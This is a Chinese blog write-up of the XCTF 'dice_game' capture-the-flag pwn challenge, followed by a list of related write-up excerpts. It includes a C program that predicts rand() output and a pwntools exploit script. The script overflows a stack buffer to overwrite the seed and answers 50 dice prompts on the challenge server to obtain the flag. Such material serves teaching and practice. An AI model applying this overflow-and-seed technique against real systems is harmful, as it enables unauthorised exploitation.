xctf 攻防世界-dicegame writeup

最新推荐文章于 2023-12-23 22:05:21 发布
原创 最新推荐文章于 2023-12-23 22:05:21 发布 · 467 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种利用缓冲区溢出漏洞,通过覆盖随机数种子实现对特定程序的攻击策略。通过设置种子值为0,编写C程序预知随机数序列,进而构造payload发送至目标服务器,成功绕过50次随机数验证,获取flag。

在这里插入图片描述
比较容易发现可以对buf进行缓冲区溢出,继续往下看

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
可以发现获得flag的条件是循环50次,50次输入的v1值与随机数v2 都相等
根据前面发现的缓冲区溢出可以发现我们可以覆盖掉seed种子值
在这里插入图片描述
那么种子值可以被我们随意设置为一个任意值,我把它设置为0,有了种子值可以写一个c程序把50次产生的随机数都求出来
有了随机数便可以编写exp了
C程序:

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(int argc, char *argv[]){
        srand(0);
        for(int i = 0;i < 50;i++){
                printf("%ld", (long)rand()%6+1);
        }
        return 0;
}
/*output:
25426251423232651155634433322261116425254446323361
*/

exp:

from pwn import *

context.log_level = 'debug'
c = remote("111.198.29.45", 57514)

payload = 'a'*0x40 + p64(0)

c.recvuntil("Welcome, let me know your name: ")
c.send(payload)

numbers = "25426251423232651155634433322261116425254446323361"

def answer():
    for j in range(50):
        c.sendlineafter("Give me the point(1~6): ",numbers[j])

answer()
c.interactive()

catch flag
在这里插入图片描述

[wp][入门]攻防世界-game
小飒的博客
06-10 1889
攻防世界 game找到主程序 让用户输入v21,v21需要满足一些条件 猜测是让游戏循环8次(for 语句) 产生8个结果 运行完后,当8个结果满足一定条件 就运行sub_457AB4(); 所以我们要看sub_457AB4();里是什么内容。双击,找到下面内容 v3以下的和v60以上异或在和0x13异或 编写python代码解题 方法二 在网上看到的 shift+s 后 alt+t(我个人尝试ctrl+f也可以) 找到done!!!the flag is 双击 右键 交叉引用列表(或者ctrl+x)
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 739
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
xctf攻防世界game writeup
qq_42983283的博客
11-04 398
下载,查看: 载入ida,f5分析,发现sub_457AB4那里很可能是答案: void main_0() { signed int i; // [esp+DCh] [ebp-20h] int v1; // [esp+F4h] [ebp-8h] sub_45A7BE(&unk_50B110); sub_45A7BE(&unk_50B158); sub_45A7BE(&unk_50B1A0); sub_45A7BE(&unk_50B1E8..
攻防世界--game
weixin_30876945的博客
08-17 1332
题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5074 1.准备 打开测试用例 首先分析程序 得到是win32程序 2.第一种方法 2.1 分析代码 使用IDA打开,找到main函数,F5得到C代码 得知主要是...
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 920
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
XCTF攻防世界--第1题快来围观学习
m0_64973256的博客
05-20 645
1.查看题目提供的信息,只要我们玩通过这游戏就可以得到flag,直接下载附件 2.发现是个exe,先查壳,c\c++编译无壳 3.打开exe查看运行流程 玩了一分钟,和作者的要求一样,我们必须玩过才能拿到flag,但是逆向怎么会乖乖听话玩呢?开始整活! 4.拖进od查看是否有关键字符 一搜索就发现了一串可疑字符,初步估计这个意思就是成果通过游戏以后的提示,那我们就跟进去 发现这个提示是一个函数过程,又看到有一个...
XCTF攻防世界--cr3-what-is-this-encryption
qq_46927150的博客
05-03 3325
cr3-what-is-this-encryption 题目来源: alexctf-2017 看到题目中的p,q,e,就想到了RSA加密 大致思路: 先把p,q,e转成十进制,再根据公式求出n,d,m n=p*q φ(N) = (p-1)(q-1) e * d % φ(N) = 1(d是私钥,e是公钥) m=c^ d mod n (m是明文) 借鉴大佬的代码: import libnum fro...
xctf攻防世界dmd-50 writeup
qq_42983283的博客
11-12 547
下载附件,打开: ida64打开,得到关键字符串780438d5b6e29db0898bc4f0225935c0: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rax __int64 v5; // rax __int64 v6; // rax __int64 v7; // rax __int64 v8; // ra..
XCTF-攻防世界-密码学crypto-新手练习区-writeup
热门推荐
Ryannn_的博客
10-23 1万+
目录 0x00 base64 0x01 Caesar 0x02 Morse 0x03 Railfence 0x04 转轮机加密 0x05 easy_RSA 0x06 Normal_RSA 0x07 不仅仅是Morse 0x08 混合编码 0x09 easychallenge 0x0A easy_ECC 0x0B 幂数加密 0x00 base64 元宵节灯谜是一种古老的传...
攻防世界-PWN进阶区-EasyPwn(XCTF 4th-WHCTF-2017)
weixin_44145820的博客
03-04 2180
这题其实不算难,不过漏洞比较隐蔽,需要细心才能发现 题目分析 checksec: RELRO只是部分开启,考虑覆写GOT表 main: echo: 在该函数中存在一个溢出: v2的大小为1000(0x3E8),而我们的输入最大为0x438(输入缓冲区大小为0x400),如果我们的输入大于0x3E8,就会覆盖了v3的内容(%s),而%s是snprintf在向v2写入数据时格式化写入的数据的,如...
攻防世界game
starmultiple的博客
01-21 614
32位iida打开 shiftF12 发现flag点击F5 分析 a=[18,64,98,5,2,4,6,3,6,48,49,65,32,12,48,65,31,78,62, 32,49,32,1,57,96,3,21,9,4,62,3,5,4,1,2,3,44,65,78,32, 16,97,54,16,44,52,32,64,89,45,32,65,15,34,18,16,0] b=[123,32,18,98,119,108,65,41,124,80,125,38,124,111,74, 49,83.
攻防世界-game
qq_70851535的博客
10-24 738
逆向题目分析
[攻防世界]game
逆向萌新的博客
06-03 1210
拖入软件中发现是一个32位没有壳的软件,打开运行一下,发现是个游戏类型的。 拖入ida中查看逻辑,直接搜索函数main,进去之后一直往下翻直到代码为止。 知道了sub_457AB4()函数里面,是flag存放的位置,告诉了我们八个全为1的时候,就可以出现flag,咱们再一次打开游戏,要是想要flag,里面的But you should pay attention to one thing,if you change the state of the Nth lamp,the state of (N-1)
攻防世界——game 游戏
Nike_name的博客
12-23 837
游戏题目改代码
攻防世界pwn——dice_game
qq_62076255的博客
12-19 585
攻防世界pwn——dice_game做题记录
攻防世界 Pwn dice_game
MrTreebook的博客
12-18 390
攻防世界 Pwn dice_game1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary,可能是简单的栈溢出 3.IDA分析 在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数 之前有做过类似的题,只要控制种子即可预测随机数 在read函数处有栈溢出的漏洞 在下面看到需要连续答对50次才可以获取flag 那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数 4.exp from pwn im
功防世界dice_game
weixin_34190136的博客
05-03 310
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
ACTF Dice Game Writeup
这里没人
05-04 869
ACTF也算是结束了,浙大的那帮人脑洞也是够大的 π__π 这题目也是坑得可以。。。像我这样的渣渣只能是挑所有题目中最简单的来了。这次的ctf好坑啊,竟然所有逆向破解题都是apk,我完全不会啊(>﹏<),只能弄到ppc了。Dice Game 题目直接把python的源码贴了出来。源码如下:#!/usr/bin/env python # coding: utf-8 """ Yet another
攻防世界 Reverse——game
XYZCG的博客
09-17 1315
打开附件是一个exe可执行程序这里的游戏说明大概的意思就是,打开这八条线路的开关使八盏灯同时亮起来。
dice_game XCTF
最新发布
01-14
### 关于Dice Game在XCTF竞赛中的问题材料 #### 题目概述 Dice Game 是 XCTF 竞赛中的一道 PWN 类型题目,该二进制文件具有特定的安全特性配置。通过 `checksec` 工具检测发现此程序启用了完整的RELRO和NX位,但是未启用栈 Canary保护措施,并且支持PIE地址空间布局随机化[^1]。 #### 安全特征分析 - **架构**: 支持amd64架构下的小端模式。 - **RELRO (重定位读只)**: 启用完全版,有助于防止攻击者利用某些类型的内存破坏漏洞。 - **Stack Canaries(堆栈金丝雀)**: 缺失这项防护意味着可能存在缓冲区溢出风险。 - **NX Bit (No-eXecute bit, 数据执行保护)**: 开启状态阻止了恶意代码注入到数据区域并被执行的可能性。 - **PIE (位置独立可执行文件)**: 此选项使得每次加载时基址不同从而增加了预测返回地址难度。 #### 示例代码展示如何基于给定种子生成一系列伪随机数值 为了模拟骰子游戏内部可能使用的随机序列,下面给出了一段C语言源码片段用于重现这一过程: ```c #include <stdio.h> #include <stdlib.h> int main(){ unsigned int seed; seed = 0x30303030; // 设定固定的种子值 srand(seed); for(int i=0;i<50;i++) printf("%d\n", rand()); return 0; } ``` 这段代码初始化了一个已知的seed之后调用了`srand()`函数来设置随机数发生器的状态;接着在一个循环里连续打印出了由`rand()`产生的前五十个整数结果[^2]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值